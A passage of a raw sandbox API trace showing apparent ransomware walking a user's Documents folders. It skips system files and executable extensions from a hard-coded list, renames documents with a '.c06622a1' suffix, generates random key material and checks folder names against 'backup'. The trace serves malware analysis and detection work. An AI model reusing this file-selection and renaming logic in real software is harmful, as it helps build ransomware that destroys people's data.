halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\okahbg2x jgzg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0158.365] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.365] ReadFile (in: hFile=0x1c, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.366] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x6ee69cb3 [0158.366] RtlComputeCrc32 (PartialCrc=0x9cb3, Buffer=0x32e4a4, Length=0x80) returned 0x61cad350 [0158.366] RtlComputeCrc32 (PartialCrc=0xd350, Buffer=0x32e4a4, Length=0x80) returned 0x72cd4b4 [0158.366] RtlComputeCrc32 (PartialCrc=0xd4b4, Buffer=0x32e4a4, Length=0x80) returned 0xa904823a [0158.366] RtlComputeCrc32 (PartialCrc=0x823a, Buffer=0x32e4a4, Length=0x80) returned 0x5e2a4882 [0158.366] CloseHandle (hObject=0x1c) returned 1 [0158.366] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.366] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx" [0158.366] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx") returned 0x62 [0158.366] wcscpy (in: _Dest=0x32b015c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.366] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\okahbg2x jgzg.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\okahbg2x jgzg.pptx.c06622a1"), dwFlags=0x8) returned 1 [0158.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\okahbg2x jgzg.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0158.369] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.369] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0158.376] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50ff62a4 [0158.376] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76e66dbe [0158.376] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7a2fb3b4 [0158.376] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc6f484d [0158.376] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78fdd0fe [0158.376] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd15dede [0158.376] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4661ac6b [0158.376] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b651c1e [0158.379] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0x696df61f [0158.379] RtlComputeCrc32 (PartialCrc=0xf61f, Buffer=0x3630094, Length=0x80) returned 0x589adde3 [0158.379] RtlComputeCrc32 (PartialCrc=0xdde3, Buffer=0x3630094, Length=0x80) returned 0xc6f1da7e [0158.379] RtlComputeCrc32 (PartialCrc=0xda7e, Buffer=0x3630094, Length=0x80) returned 0x402afae5 [0158.379] RtlComputeCrc32 (PartialCrc=0xfae5, Buffer=0x3630094, Length=0x80) returned 0x968d7515 [0158.379] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0158.379] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.379] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.379] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c059ee0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c059ee0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c059ee0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0158.379] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0158.379] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1b948c0, ftCreationTime.dwHighDateTime=0x1d5d826, ftLastAccessTime.dwLowDateTime=0x19537e00, ftLastAccessTime.dwHighDateTime=0x1d5e4ea, ftLastWriteTime.dwLowDateTime=0x19537e00, ftLastWriteTime.dwHighDateTime=0x1d5e4ea, nFileSizeHigh=0x0, nFileSizeLow=0x17319, dwReserved0=0x0, dwReserved1=0x0, cFileName="XHvkaY6KLNiJuFyAk_.doc", cAlternateFileName="XHVKAY~1.DOC")) returned 1 [0158.379] _wcsicmp (_Str1="XHvkaY6KLNiJuFyAk_.doc", _Str2="README.c06622a1.TXT") returned 6 [0158.379] wcsstr (_Str="XHvkaY6KLNiJuFyAk_.doc", _SubStr="README") returned 0x0 [0158.379] _wcsicmp (_Str1="autorun.inf", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -23 [0158.379] wcslen (_String="autorun.inf") returned 0xb [0158.379] _wcsicmp (_Str1="boot.ini", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -22 [0158.380] wcslen (_String="boot.ini") returned 0x8 [0158.380] _wcsicmp (_Str1="bootfont.bin", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -22 [0158.380] wcslen (_String="bootfont.bin") returned 0xc [0158.380] _wcsicmp (_Str1="bootsect.bak", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -22 [0158.380] wcslen (_String="bootsect.bak") returned 0xc [0158.380] _wcsicmp (_Str1="desktop.ini", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -20 [0158.380] wcslen (_String="desktop.ini") returned 0xb [0158.380] _wcsicmp (_Str1="iconcache.db", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -15 [0158.380] wcslen (_String="iconcache.db") returned 0xc [0158.380] _wcsicmp (_Str1="ntldr", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -10 [0158.380] wcslen (_String="ntldr") returned 0x5 [0158.380] _wcsicmp (_Str1="ntuser.dat", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -10 [0158.380] wcslen (_String="ntuser.dat") returned 0xa [0158.380] _wcsicmp (_Str1="ntuser.dat.log", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -10 [0158.380] wcslen (_String="ntuser.dat.log") returned 0xe [0158.380] _wcsicmp (_Str1="ntuser.ini", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -10 [0158.380] wcslen (_String="ntuser.ini") returned 0xa [0158.380] _wcsicmp (_Str1="thumbs.db", _Str2="XHvkaY6KLNiJuFyAk_.doc") returned -4 [0158.380] wcslen (_String="thumbs.db") returned 0x9 [0158.380] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0158.380] wcslen (_String="386") returned 0x3 [0158.380] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0158.380] wcslen (_String="adv") returned 0x3 [0158.380] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0158.380] wcslen (_String="ani") returned 0x3 [0158.380] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0158.380] wcslen (_String="bat") returned 0x3 [0158.380] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0158.380] wcslen (_String="bin") returned 0x3 [0158.380] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0158.380] wcslen (_String="cab") returned 0x3 [0158.380] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0158.380] wcslen (_String="cmd") returned 0x3 [0158.380] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0158.380] wcslen (_String="com") returned 0x3 [0158.380] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0158.381] wcslen (_String="cpl") returned 0x3 [0158.381] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0158.381] wcslen (_String="cur") returned 0x3 [0158.381] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0158.381] wcslen (_String="deskthemepack") returned 0xd [0158.381] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0158.381] wcslen (_String="diagcab") returned 0x7 [0158.381] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0158.381] wcslen (_String="diagcfg") returned 0x7 [0158.381] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0158.381] wcslen (_String="diagpkg") returned 0x7 [0158.381] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0158.381] wcslen (_String="dll") returned 0x3 [0158.381] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0158.381] wcslen (_String="drv") returned 0x3 [0158.381] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0158.381] wcslen (_String="exe") returned 0x3 [0158.381] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0158.381] wcslen (_String="hlp") returned 0x3 [0158.381] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0158.381] wcslen (_String="icl") returned 0x3 [0158.381] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0158.381] wcslen (_String="icns") returned 0x4 [0158.381] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0158.381] wcslen (_String="ico") returned 0x3 [0158.381] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0158.381] wcslen (_String="ics") returned 0x3 [0158.381] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0158.381] wcslen (_String="idx") returned 0x3 [0158.381] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0158.381] wcslen (_String="ldf") returned 0x3 [0158.381] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0158.381] wcslen (_String="lnk") returned 0x3 [0158.381] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0158.381] wcslen (_String="mod") returned 0x3 [0158.382] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0158.382] wcslen (_String="mpa") returned 0x3 [0158.382] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0158.382] wcslen (_String="msc") returned 0x3 [0158.382] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0158.382] wcslen (_String="msp") returned 0x3 [0158.382] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0158.382] wcslen (_String="msstyles") returned 0x8 [0158.382] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0158.382] wcslen (_String="msu") returned 0x3 [0158.382] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0158.382] wcslen (_String="nls") returned 0x3 [0158.382] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0158.382] wcslen (_String="nomedia") returned 0x7 [0158.382] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0158.382] wcslen (_String="ocx") returned 0x3 [0158.382] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0158.382] wcslen (_String="prf") returned 0x3 [0158.382] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0158.382] wcslen (_String="ps1") returned 0x3 [0158.382] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0158.382] wcslen (_String="rom") returned 0x3 [0158.382] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0158.382] wcslen (_String="rtp") returned 0x3 [0158.382] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0158.382] wcslen (_String="scr") returned 0x3 [0158.382] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0158.382] wcslen (_String="shs") returned 0x3 [0158.382] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 [0158.382] wcslen (_String="spl") returned 0x3 [0158.382] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0158.382] wcslen (_String="sys") returned 0x3 [0158.382] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0158.382] wcslen (_String="theme") returned 0x5 [0158.382] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0158.382] wcslen (_String="themepack") returned 0x9 [0158.383] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0158.383] wcslen (_String="wpx") returned 0x3 [0158.383] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0158.383] wcslen (_String="lock") returned 0x4 [0158.383] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0158.383] wcslen (_String="key") returned 0x3 [0158.383] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0158.383] wcslen (_String="hta") returned 0x3 [0158.383] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0158.383] wcslen (_String="msi") returned 0x3 [0158.383] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0158.383] wcslen (_String="pdb") returned 0x3 [0158.383] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0158.383] wcslen (_String="sqlite") returned 0x6 [0158.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 0x10 [0158.383] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.383] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" [0158.383] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned 0x4f [0158.383] wcscpy (in: _Dest=0x32a0130, _Source="XHvkaY6KLNiJuFyAk_.doc" | out: _Dest="XHvkaY6KLNiJuFyAk_.doc") returned="XHvkaY6KLNiJuFyAk_.doc" [0158.383] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc", dwFileAttributes=0x80) returned 1 [0158.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\xhvkay6klnijufyak_.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0158.384] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.384] ReadFile (in: hFile=0x1b8, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.384] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x53685a41 [0158.384] RtlComputeCrc32 (PartialCrc=0x5a41, Buffer=0x32e4a4, Length=0x80) returned 0x7873d46f [0158.384] RtlComputeCrc32 (PartialCrc=0xd46f, Buffer=0x32e4a4, Length=0x80) returned 0x2c4c5252 [0158.385] RtlComputeCrc32 (PartialCrc=0x5252, Buffer=0x32e4a4, Length=0x80) returned 0xa810fbee [0158.385] RtlComputeCrc32 (PartialCrc=0xfbee, Buffer=0x32e4a4, Length=0x80) returned 0x84767675 [0158.385] CloseHandle (hObject=0x1b8) returned 1 [0158.385] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.385] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc" [0158.385] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc") returned 0x66 [0158.385] wcscpy (in: _Dest=0x32b0164, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.385] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\xhvkay6klnijufyak_.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\xhvkay6klnijufyak_.doc.c06622a1"), dwFlags=0x8) returned 1 [0158.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\XHvkaY6KLNiJuFyAk_.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\xhvkay6klnijufyak_.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0158.396] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.396] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0158.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x429fa0f7 [0158.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27b7bcf9 [0158.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x262ab365 [0158.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a7ce567 [0158.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b816c6f [0158.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x606dd48e [0158.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc00737a [0158.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3437b313 [0158.406] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0x6846a162 [0158.406] RtlComputeCrc32 (PartialCrc=0xa162, Buffer=0x36c0094, Length=0x80) returned 0x8d3d75b2 [0158.406] RtlComputeCrc32 (PartialCrc=0x75b2, Buffer=0x36c0094, Length=0x80) returned 0xea6f4eb9 [0158.406] RtlComputeCrc32 (PartialCrc=0x4eb9, Buffer=0x36c0094, Length=0x80) returned 0x430b4cc2 [0158.406] RtlComputeCrc32 (PartialCrc=0x4cc2, Buffer=0x36c0094, Length=0x80) returned 0xcf796db9 [0158.406] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0158.407] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.407] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.407] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.407] FindClose (in: hFindFile=0x154208 | out: hFindFile=0x154208) returned 1 [0158.407] _wcsicmp (_Str1="backup", _Str2="-QFYowbe") returned 53 [0158.407] wcslen (_String="backup") returned 0x6 [0158.407] _wcsicmp (_Str1="bak", _Str2="-QFYowbe") returned 53 [0158.407] wcslen (_String="bak") returned 0x3 [0158.407] _wcsicmp (_Str1="back", _Str2="-QFYowbe") returned 53 [0158.407] wcslen (_String="back") returned 0x4 [0158.407] _wcsicmp (_Str1="archive", _Str2="-QFYowbe") returned 52 [0158.407] wcslen (_String="archive") returned 0x7 [0158.407] _wcsicmp (_Str1="bckp", _Str2="-QFYowbe") returned 53 [0158.407] wcslen (_String="bckp") returned 0x4 [0158.407] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3270078) returned 1 [0158.409] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3280080) returned 1 [0158.410] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3a5040, ftCreationTime.dwHighDateTime=0x1d5da1e, ftLastAccessTime.dwLowDateTime=0x82db650, ftLastAccessTime.dwHighDateTime=0x1d5d8c8, ftLastWriteTime.dwLowDateTime=0x82db650, ftLastWriteTime.dwHighDateTime=0x1d5d8c8, nFileSizeHigh=0x0, nFileSizeLow=0x6534, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Pii2h.xls", cAlternateFileName="")) returned 1 [0158.410] _wcsicmp (_Str1="2Pii2h.xls", _Str2="README.c06622a1.TXT") returned -64 [0158.410] wcsstr (_Str="2Pii2h.xls", _SubStr="README") returned 0x0 [0158.410] _wcsicmp (_Str1="autorun.inf", _Str2="2Pii2h.xls") returned 47 [0158.410] wcslen (_String="autorun.inf") returned 0xb [0158.410] _wcsicmp (_Str1="boot.ini", _Str2="2Pii2h.xls") returned 48 [0158.410] wcslen (_String="boot.ini") returned 0x8 [0158.410] _wcsicmp (_Str1="bootfont.bin", _Str2="2Pii2h.xls") returned 48 [0158.410] wcslen (_String="bootfont.bin") returned 0xc [0158.410] _wcsicmp (_Str1="bootsect.bak", _Str2="2Pii2h.xls") returned 48 [0158.410] wcslen (_String="bootsect.bak") returned 0xc [0158.410] _wcsicmp (_Str1="desktop.ini", _Str2="2Pii2h.xls") returned 50 [0158.410] wcslen (_String="desktop.ini") returned 0xb [0158.410] _wcsicmp (_Str1="iconcache.db", _Str2="2Pii2h.xls") returned 55 [0158.410] wcslen (_String="iconcache.db") returned 0xc [0158.410] _wcsicmp (_Str1="ntldr", _Str2="2Pii2h.xls") returned 60 [0158.410] wcslen (_String="ntldr") returned 0x5 [0158.410] _wcsicmp (_Str1="ntuser.dat", _Str2="2Pii2h.xls") returned 60 [0158.410] wcslen (_String="ntuser.dat") returned 0xa [0158.410] _wcsicmp (_Str1="ntuser.dat.log", _Str2="2Pii2h.xls") returned 60 [0158.410] wcslen (_String="ntuser.dat.log") returned 0xe [0158.410] _wcsicmp (_Str1="ntuser.ini", _Str2="2Pii2h.xls") returned 60 [0158.410] wcslen (_String="ntuser.ini") returned 0xa [0158.410] _wcsicmp (_Str1="thumbs.db", _Str2="2Pii2h.xls") returned 66 [0158.410] wcslen (_String="thumbs.db") returned 0x9 [0158.410] _wcsicmp (_Str1="386", _Str2="xls") returned -69 [0158.410] wcslen (_String="386") returned 0x3 [0158.410] _wcsicmp (_Str1="adv", _Str2="xls") returned -23 [0158.410] wcslen (_String="adv") returned 0x3 [0158.410] _wcsicmp (_Str1="ani", _Str2="xls") returned -23 [0158.410] wcslen (_String="ani") returned 0x3 [0158.410] _wcsicmp (_Str1="bat", _Str2="xls") returned -22 [0158.410] wcslen (_String="bat") returned 0x3 [0158.411] _wcsicmp (_Str1="bin", _Str2="xls") returned -22 [0158.411] wcslen (_String="bin") returned 0x3 [0158.411] _wcsicmp (_Str1="cab", _Str2="xls") returned -21 [0158.411] wcslen (_String="cab") returned 0x3 [0158.411] _wcsicmp (_Str1="cmd", _Str2="xls") returned -21 [0158.411] wcslen (_String="cmd") returned 0x3 [0158.411] _wcsicmp (_Str1="com", _Str2="xls") returned -21 [0158.411] wcslen (_String="com") returned 0x3 [0158.411] _wcsicmp (_Str1="cpl", _Str2="xls") returned -21 [0158.411] wcslen (_String="cpl") returned 0x3 [0158.411] _wcsicmp (_Str1="cur", _Str2="xls") returned -21 [0158.411] wcslen (_String="cur") returned 0x3 [0158.411] _wcsicmp (_Str1="deskthemepack", _Str2="xls") returned -20 [0158.411] wcslen (_String="deskthemepack") returned 0xd [0158.411] _wcsicmp (_Str1="diagcab", _Str2="xls") returned -20 [0158.411] wcslen (_String="diagcab") returned 0x7 [0158.411] _wcsicmp (_Str1="diagcfg", _Str2="xls") returned -20 [0158.411] wcslen (_String="diagcfg") returned 0x7 [0158.411] _wcsicmp (_Str1="diagpkg", _Str2="xls") returned -20 [0158.411] wcslen (_String="diagpkg") returned 0x7 [0158.411] _wcsicmp (_Str1="dll", _Str2="xls") returned -20 [0158.411] wcslen (_String="dll") returned 0x3 [0158.411] _wcsicmp (_Str1="drv", _Str2="xls") returned -20 [0158.411] wcslen (_String="drv") returned 